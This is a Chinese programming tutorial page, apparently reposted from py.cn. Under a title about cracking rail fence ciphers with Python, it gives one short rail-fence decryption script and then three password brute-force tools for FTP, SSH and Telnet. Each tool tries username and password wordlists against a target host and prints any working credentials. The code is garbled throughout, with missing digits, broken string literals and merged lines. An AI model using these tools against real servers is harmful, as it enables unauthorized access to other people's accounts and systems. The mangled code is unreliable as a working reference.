hmoban Python脚本多种方法破解栅栏密码
Python是一种计算机程序设计语言。是一种面向对象的动态类型语言,最初被设计用于编写自动化脚本(shell),随着版本的不断更新和语言新功能的添加,越来越多被用于独立的、大型项目的开发。
Python脚本简单易用,对于要破解的栅栏密码,最简单的可以使用快速编写的Python脚本进行暴力破解:
通用脚本:
#!/usr/bin/env python
# -*- coding: gbk -*-
# -*- coding: utf_ -*-
e = raw_input(‘请输入要解密的字符串
‘)
elen = len(e)
field=[]
for i in range(,elen):
if(elen%i==):
field.append(i)
for f in field:
b = elen / f
result = {x:‘‘ for x in range(b)}
for i in range(elen):
a = i % b;
result.update({a:result[a] + e[i]})
d = ‘‘
for i in range(b):
d = d + result[i]
print ‘分为 ‘+str(f)+‘ ‘+‘栏时,解密结果为: ‘+d
FTP暴力破解脚本
#!/usr/bin/env python
#-*-coding = utf--*-
#author:@xfk
#blog:@blog.sina.com.cn/kaiyongdeng
#date:@--
import sys, os, time
from ftplib import FTP
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ftp_bf.py
[*] Coder :
[*] Version : .
[*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def logo():
print G+"
|---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ftp_bf.py v.. |"
print " | FTP Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|
"
print "
[-] %s
" % time.strftime("%X")
print docs+END
def help():
print R+"[*]-t, --target ip/hostname <> Our target"
print "[*]-u, --usernamelist usernamelist <> usernamelist path"
print "[*]-p, --passwordlist passwordlist <> passwordlist path"
print "[*]-h, --help help <> print this help"
print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit()
def bf_login(hostname,username,password):
# sys.stdout.write("[!]Checking : %s " % (p))
# sys.stdout.flush()
try:
ftp = FTP(hostname)
ftp.login(hostname,username, password)
ftp.retrlines('list')
ftp.quit()
print Y+"
[!] wt,wt!!! We did it ! "
print "[+] Target : ",hostname, ""
print "[+] User : ",username, ""
print "[+] Password : ",password, ""+END
return
# sys.exit()
except Exception, e:
pass except KeyboardInterrupt: print R+"
[-] Exiting ...
"+END
sys.exit()
def anon_login(hostname):
try:
print G+"
[!] Checking for anonymous login.
"+END
ftp = FTP(hostname) ftp.login()
ftp.retrlines('LIST')
print Y+"
[!] wt,wt!!! Anonymous login successfuly !
"+END
ftp.quit()
except Exception, e:
print R+"
[-] Anonymous login failed...
"+END
pass
def main():
logo()
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
usernamelist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
passwordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars input
"+END
help()
print G+"[!] BruteForcing target ..."+END
anon_login(hostname)
# print "here is ok"
# print hostname
try:
usernames = open(usernamelist, "r")
user = usernames.readlines()
count =
while count < len(user):
user[count] = user[count].strip()
count +=
except:
print R+"
[-] Cheak your usernamelist path
"+END
sys.exit()
# print "here is ok ",usernamelist,passwordlist
try:
passwords = open(passwordlist, "r")
pwd = passwords.readlines()
count =
while count < len(pwd):
pwd[count] = pwd[count].strip()
count +=
except:
print R+"
[-] Check your passwordlist path
"+END
sys.exit()
print G+"
[+] Loaded:",len(user),"usernames"
print "
[+] Loaded:",len(pwd),"passwords"
print "[+] Target:",hostname
print "[+] Guessing...
"+END
for u in user: for p in pwd:
result = bf_login(hostname,u.replace("
",""),p.replace("
",""))
if result != :
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
else:
print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
if not result :
print R+"
[-]There is no username ans password enabled in the list."
print "[-]Exiting...
"+END
if __name__ == "__main__":
main()
SSH暴力破解
#!/usr/bin/env python
#-*-coding = UTF--*-
#author@:dengyongkai
#blog@:blog.sina.com.cn/kaiyongdeng
import sys
import os
import time
#from threading import Thread
try:
from paramiko import SSHClient
from paramiko import AutoAddPolicy
except ImportError:
print G+'''
You need paramiko module.
http://www.lag.net/paramiko/
Debian/Ubuntu: sudo apt-get install aptitude
: sudo aptitude install python-paramiko
'''+END
sys.exit()
docs = """
[*] This was written for educational purpose and pentest only. Use it at your own risk.
[*] Author will be not responsible for any damage!
[*] Toolname : ssh_bf.py
[*] Author : xfk
[*] Version : v..
[*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
"""
if sys.platform == 'linux' or sys.platform == 'linux':
clearing = 'clear'
else:
clearing = 'cls'
os.system(clearing)
R = "[m";
G = "[m";
Y = "[m"
END = "[m"
def logo():
print G+"
|---------------------------------------------------------------|"
print " | |"
print " | blog.sina.com.cn/kaiyongdeng |"
print " | // ssh_bf.py v.. |"
print " | SSH Brute Forcing Tool |"
print " | |"
print " |---------------------------------------------------------------|
"
print "
[-] %s
" % time.ctime()
print docs+END
def help():
print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
print " [*]-P --port <>the ssh service port(default is )"
print " [*]-U --usernamelist <>usernames list file"
print " [*]-P --passwordlist <>passwords list file"
print " [*]-H --help <>show help information"
print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
sys.exit()
def BruteForce(hostname,port,username,password):
'''
Create SSH connection to target
'''
ssh = SSHClient()
ssh.set_missing_host_key_policy(AutoAddPolicy())
try:
ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
status = 'ok'
ssh.close()
except Exception, e:
status = 'error'
pass
return status
def makelist(file):
'''
Make usernames and passwords lists
'''
items = []
try:
fd = open(file, 'r')
except IOError:
print R+'unable to read file '%s'' % file+END
pass
except Exception, e:
print R+'unknown error'+END
pass
for line in fd.readlines():
item = line.replace('
', '').replace('', '')
items.append(item)
fd.close()
return items
def main():
logo()
# print "hello wold"
try:
for arg in sys.argv:
if arg.lower() == '-t' or arg.lower() == '--target':
hostname = str(sys.argv[int(sys.argv[:].index(arg))+])
if arg.lower() == '-p' or arg.lower() == '--port':
port = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-u' or arg.lower() == '--userlist':
userlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[:].index(arg))+]
elif arg.lower() == '-h' or arg.lower() == '--help':
help()
elif len(sys.argv) <= :
help()
except:
print R+"[-]Cheak your parametars input
"+END
help()
print G+"
[!] BruteForcing target ...
"+END
# print "here is ok"
# print hostname,port,wordlist,userlist
usernamelist = makelist(userlist)
passwordlist = makelist(wordlist)
print Y+"[*] SSH Brute Force Praparing."
print "[*] %s user(s) loaded." % str(len(usernamelist))
print "[*] %s password(s) loaded." % str(len(passwordlist))
print "[*] Brute Force Is Starting......."+END
try:
for username in usernamelist:
for password in passwordlist:
print G+"
[+]Attempt uaername:%s password:%s..." % (username,password)+END
current = BruteForce(hostname, port, username, password)
if current == 'error':
print R+"[-]O*O The username:%s and password:%s Is Disenbabled...
" % (username,password)+END
# pass
else:
print G+"
[+] ^-^ HaHa,We Got It!!!"
print "[+] username: %s" % username
print "[+] password: %s
" % password+END
# sys.exit()
except:
print R+"
[-] There Is Something Wrong,Pleace Cheak It."
print "[-] Exitting.....
"+END
raise
print Y+"[+] Done.^-^
"+END
sys.exit()
if __name__ == "__main__":
main()
TELNET密码暴力破解
#!usr/bin/python
#Telnet Brute Forcer
#http://www.darkcde.com
#dhydr[at]gmail[dot]com
import threading, time, random, sys, telnetlib
from copy import copy
if len(sys.argv) !=:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit()
try:
users = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your userlist path
"
sys.exit()
try:
words = open(sys.argv[], "r").readlines()
except(IOError):
print "Error: Check your wordlist path
"
sys.exit()
print "
dhydr[at]gmail[dot]com TelnetBruteForcer v."
print " --------------------------------------------------
"
print "[+] Server:",sys.argv[]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"
"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != :
value = random.sample(words, )
words.remove(value[])
else:
print "
Reloading Wordlist - Changing User
"
reloader()
value = random.sample(words, )
users.remove(users[])
lock.release()
if len(users) ==:
return value[][:-], users[]
else:
return value[][:-], users[][:-]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*
print "User:",user,"Password:",value
tn = telnetlib.Telnet(sys.argv[])
tn.read_until("login: ")
tn.write(user + "
")
if password:
tn.read_until("Password: ")
tn.write(value + "
")
tn.write("ls
")
tn.write("exit
")
print tn.read_all()
print "
Login successful:",value, user
tn.close()
work.join()
sys.exit()
except:
pass
for I in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep()</wordlist></userlist></server>
来源:PY学习网:原文地址:https://www.py.cn/article.html